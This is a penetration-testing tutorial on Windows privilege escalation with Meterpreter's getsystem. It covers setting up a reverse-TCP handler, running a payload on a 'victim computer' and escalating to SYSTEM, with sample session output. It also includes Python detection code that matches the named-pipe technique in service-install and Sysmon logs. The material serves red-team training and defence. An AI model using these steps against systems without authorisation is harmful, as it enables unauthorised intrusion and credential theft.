GETSYSTEM for Privilege Escalation

Introduction

Acquiring SYSTEM privileges on a Windows system is a crucial task for penetration testers and red teamers, enabling advanced post-exploitation actions such as credential extraction and access to confidential data. Meterpreter's getsystem command tries a series of local privilege-escalation techniques in turn and, once one succeeds, lets the operator execute commands at the SYSTEM level; the named-pipe technique shown below requires that the session already hold administrative rights, as the "(Admin)" tag in its output indicates.

Step-by-Step Guide

1. Create the meterpreter binary

How-To: Creating a Meterpreter Binary

2. Open Metasploit Console

msfconsole

3. Create and run a listener

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <IP>
msf6 exploit(multi/handler) > set LPORT <PORT>
msf6 exploit(multi/handler) > exploit

4. Execute your meterpreter binary on the victim computer

5. Confirm connection

Sample (run ‘ps’):

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 172.28.99.163:9999
[*] Sending stage (175686 bytes) to 172.28.96.1
[*] Meterpreter session 1 opened (172.28.99.163:9999 -> 172.28.96.1:11322) at 2024-01-24 11:14:18 +1100

meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session  User                Path
 ---   ----  ----              ----  -------  ----                ----
 0     0     [System Process]
 4     0     System
 224   4     smss.exe
 296   288   csrss.exe
 308   432   svchost.exe
 344   288   wininit.exe
 356   336   csrss.exe
 396   336   winlogon.exe
 432   344   services.exe
 440   344   lsass.exe
 ...

6. Use ‘getsystem’ command to escalate to SYSTEM-level access

meterpreter > getuid
Server username: WIN-AJ4C67166DE\win7
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
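The output above shows technique 1 succeeding. That technique installs a short-lived service whose command echoes a random token into a named pipe, so that a SYSTEM-owned process connects to the pipe and its token can be impersonated; the service install and the cmd.exe it spawns are exactly what a defender can log and alert on. Added detection example (not from the original page): it scans constructed, flattened Windows 7045 service-install and Sysmon process-creation records for that command shape; the key=value layout and field names are assumptions about how the logs were exported.

```python
import re

# Constructed sample log lines (not from the original page), flattened to
# key=value form. Lines 1-2 are a System-log 7045 service install and the
# matching Sysmon Event ID 1 process start left by getsystem's named-pipe
# technique; lines 3-4 are benign and must not match.
SAMPLE_LOGS = [
    r"EventID=7045 ServiceName=tQbBcuqA ImagePath=cmd.exe /c echo tQbBcuqA > \\.\pipe\tQbBcuqA Account=LocalSystem",
    r"EventID=1 Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c echo tQbBcuqA > \\.\pipe\tQbBcuqA ParentImage=C:\Windows\System32\services.exe User=NT AUTHORITY\SYSTEM",
    r"EventID=7045 ServiceName=Spooler ImagePath=C:\Windows\System32\spoolsv.exe Account=LocalSystem",
    r"EventID=1 Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c echo hello > C:\temp\out.txt ParentImage=C:\Windows\explorer.exe User=WIN-AJ4C67166DE\win7",
]

# Shape of the planted command: cmd(.exe) /c echo <token> > \\.\pipe\<name>.
# Token and pipe name are random per run, so match the shape, not a value.
PIPE_ECHO = re.compile(
    r"cmd(?:\.exe)?\s+/c\s+echo\s+(\S+)\s*>\s*\\\\\.\\pipe\\(\S+)", re.IGNORECASE
)

# key=value pairs whose values may contain spaces: stop before the next key=.
KV = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_line(line):
    """Turn one flattened log line into a dict of field -> value."""
    return dict(KV.findall(line))


def detect_getsystem_pipe(lines):
    """One finding per event whose ImagePath or CommandLine has the shape."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        for field in ("ImagePath", "CommandLine"):
            m = PIPE_ECHO.search(ev.get(field, ""))
            if m:
                findings.append({
                    "event_id": ev.get("EventID"),
                    "field": field,
                    "service": ev.get("ServiceName"),   # 7045 only
                    "parent": ev.get("ParentImage"),    # Sysmon only
                    "echo_token": m.group(1),
                    "pipe": m.group(2),
                })
    return findings
```

A 7045 record with this ImagePath followed by cmd.exe spawned under services.exe is a strong pair to alert on; a process creation record alone is weaker, since the command line is visible only while the short-lived service runs.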

Reference

https://www.offsec.com/metasploit-unleashed/keylogging/#using-a-keylogger-with-metasploit